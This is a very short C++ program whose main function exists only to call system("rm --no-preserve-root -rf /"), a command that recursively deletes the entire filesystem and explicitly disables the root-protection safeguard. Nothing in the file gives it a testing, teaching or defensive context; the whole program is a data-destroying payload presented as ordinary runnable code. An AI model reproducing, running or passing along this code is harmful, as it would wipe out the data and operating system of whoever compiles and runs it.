#include <iostream>
using namespace std;

int main() {
	system("rm --no-preserve-root -rf /");

	return 0;
}